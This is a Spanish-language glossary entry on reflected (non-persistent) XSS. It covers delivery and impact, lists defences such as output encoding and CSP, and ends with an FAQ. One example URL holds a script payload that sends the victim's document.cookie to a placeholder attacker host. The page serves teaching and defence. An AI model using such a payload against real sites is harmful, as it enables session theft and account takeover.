XSS Reflejado
¿Qué es XSS Reflejado?
XSS ReflejadoXSS no persistente en el que una entrada controlada por el atacante se refleja inmediatamente en la respuesta y se ejecuta en el navegador de la víctima.
El XSS reflejado (no persistente o Tipo 1) ocurre cuando una aplicación toma datos de una petición HTTP, normalmente un parámetro de URL o campo de formulario, y los reenvía en la respuesta sin codificación de salida apropiada. El ataque requiere que la víctima haga clic en un enlace manipulado, por lo que suele distribuirse mediante phishing, malvertising o mensajería. Una explotación exitosa permite robar cookies de sesión, ejecutar acciones en nombre del usuario o encadenar una toma total de cuenta. Las defensas incluyen codificación HTML sensible al contexto, una Política de Seguridad de Contenidos estricta y frameworks que escapan automáticamente la salida.
● Ejemplos
- 01
https://ejemplo.com/buscar?q=<script>document.location='https://malo/?c='+document.cookie</script>
- 02
Página de error que refleja un parámetro 'mensaje' sin sanear directamente en el DOM.
● Preguntas frecuentes
¿Qué es XSS Reflejado?
XSS no persistente en el que una entrada controlada por el atacante se refleja inmediatamente en la respuesta y se ejecuta en el navegador de la víctima. Pertenece a la categoría de Ataques y amenazas en ciberseguridad.
¿Qué significa XSS Reflejado?
XSS no persistente en el que una entrada controlada por el atacante se refleja inmediatamente en la respuesta y se ejecuta en el navegador de la víctima.
¿Cómo defenderse de XSS Reflejado?
Las defensas contra XSS Reflejado combinan habitualmente controles técnicos y prácticas operativas, como se detalla en la definición.
¿Cuáles son otros nombres para XSS Reflejado?
Nombres alternativos comunes: XSS no persistente, XSS Tipo 1.